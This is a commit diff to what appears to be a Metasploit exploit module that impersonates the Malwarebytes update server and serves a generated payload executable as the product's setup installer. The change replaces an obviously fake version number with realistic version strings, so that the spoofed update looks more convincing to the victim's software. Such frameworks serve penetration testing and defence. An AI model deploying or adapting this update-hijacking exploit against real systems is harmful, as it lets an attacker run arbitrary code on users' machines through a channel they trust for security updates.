Enforce update to real versions

sgabe · sgabe · commit dbe5dd77e3a7 · 2015-01-25T10:53:14.000+01:00
diff --git a/modules/exploits/windows/browser/mbam_update_exec.rb b/modules/exploits/windows/browser/mbam_update_exec.rb
@@ -58,6 +58,11 @@ def on_request_uri(cli, request)
     ua = request['User-Agent']
     uri = request.uri
 
+    newvers = {
+      'mbam' => '2.0.3.1025',
+      'mbae' => '1.04.1.1012'
+    }
+
     unless agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
       print_error("User agent cannot be identified")
       send_response(cli, '')
@@ -85,11 +90,11 @@ def on_request_uri(cli, request)
         return
       end
 
-      print_status("Enforcing update to version 9.99.9.9999")
-      send_response(cli, '9.99.9.9999', {
+      print_status("Enforcing update to version #{newvers[agent]}")
+      send_response(cli, newvers[agent], {
         'Content-Type' => 'application/octet-stream'
       })
-    when "/v2/#{agent}/consumer/data/#{agent}-setup-9.99.9.9999.exe"
+    when "/v2/#{agent}/consumer/data/#{agent}-setup-#{newvers[agent]}.exe"
       print_status("Sending payload EXE...")
       send_response(cli, generate_payload_exe, {
         'Content-Type' => 'application/x-msdos-program'
